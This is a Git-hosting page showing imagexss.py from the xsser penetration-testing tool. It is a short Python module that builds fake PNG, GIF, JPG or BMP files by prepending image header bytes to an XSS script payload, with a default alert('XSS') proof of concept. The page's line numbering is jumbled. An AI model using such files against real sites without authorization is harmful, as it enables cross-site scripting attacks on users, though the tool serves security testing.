Trang chủ Khám phá Trợ giúp
Đăng nhập
epsylon
/
xsser
Xem 1
Star 0
Fork 0
Các tập tin Các vấn đề 0 Yêu cầu khéo về 0
Tree: ef8e8c3f4c
Branches Tags
xsser
/
xsser
/
core
/
imagexss.py

imagexss.py 2.3 KB
Lịch sử Raw

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869 
  1. #!/usr/bin/env python
    2. 

  2. # -*- coding: utf-8 -*-"
    3. 

  3. # vim: set expandtab tabstop=4 shiftwidth=4:
    4. 

  4. """
    5. 

  5. $Id$
    6. 

  6. 

  7. This file is part of the xsser project, http://xsser.03c8.net
    8. 

  8. 

  9. Copyright (c) 2011/2016 psy <epsylon@riseup.net>
    10. 

  10. 

  11. xsser is free software; you can redistribute it and/or modify it under
    12. 

  12. the terms of the GNU General Public License as published by the Free
    13. 

  13. Software Foundation version 3 of the License.
    14. 

  14. 

  15. xsser is distributed in the hope that it will be useful, but WITHOUT ANY
    16. 

  16. WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
    17. 

  17. FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
    18. 

  18. details.
    19. 

  19. 

  20. You should have received a copy of the GNU General Public License along
    21. 

  21. with xsser; if not, write to the Free Software Foundation, Inc., 51
    22. 

  22. Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
    23. 

  23. """
    24. 

  24. import os
    25. 

  25. 

  26. class ImageInjections(object):
    27. 

  27.     
    28. 

  28.     def __init__(self, payload =''):
    29. 

  29.         self._payload = payload
    30. 

  30. 

  31.     def image_xss(self, filename, payload):
    32. 

  32.         """
    33. 

  33.         Create -fake- image with code XSS injected.
    34. 

  34.         """
    35. 

  35.         # check user image name input valid extensions
    36. 

  36.         root, ext = os.path.splitext(filename)
    37. 

  37.         
    38. 

  38. 	# create file and inject code
    39. 

  39.         if ext.lower() in [".png", ".jpg", ".gif", ".bmp"]:
    40. 

  40.             f = open(filename, 'wb')
    41. 

  41. 						                
    42. 

  42.             # check user payload input
    43. 

  43.             user_payload = payload
    44. 

  44.             if not user_payload:
    45. 

  45.                 user_payload = "<script>alert('XSS')</script>"
    46. 

  46. 	
    47. 

  47.             # inject each XSS specific code     
    48. 

  48.             if ext.lower() == ".png":
    49. 

  49.                 content = '‰PNG' + user_payload
    50. 

  50.             elif ext.lower() == ".gif":
    51. 

  51.                 content = 'GIF89a' + user_payload
    52. 

  52.             elif ext.lower() == ".jpg":
    53. 

  53.                 content = 'ÿØÿà JFIF' + user_payload
    54. 

  54.             elif ext.lower() == ".bmp":
    55. 

  55.                 content = 'BMFÖ' + user_payload
    56. 

  56. 

  57.             # write and close
    58. 

  58.             f.write(content)
    59. 

  59.             f.close()
    60. 

  60. 

  61.             image_results = "\nCode: "+ content + "\nFile: ", root + ext
    62. 

  62.         else:
    63. 

  63.             image_results = "\nPlease select a supported extension = .PNG, .GIF, .JPG or .BMP"
    64. 

  64.         return image_results
    65. 

  65. 

  66. if __name__ == '__main__':
    67. 

  67.     image_xss_injection = ImageInjections('')
    68. 

  68.     print image_xss_injection.image_xss('ImageXSSpoison.png' , "<script>alert('XSS')</script>")
    69. 

  69.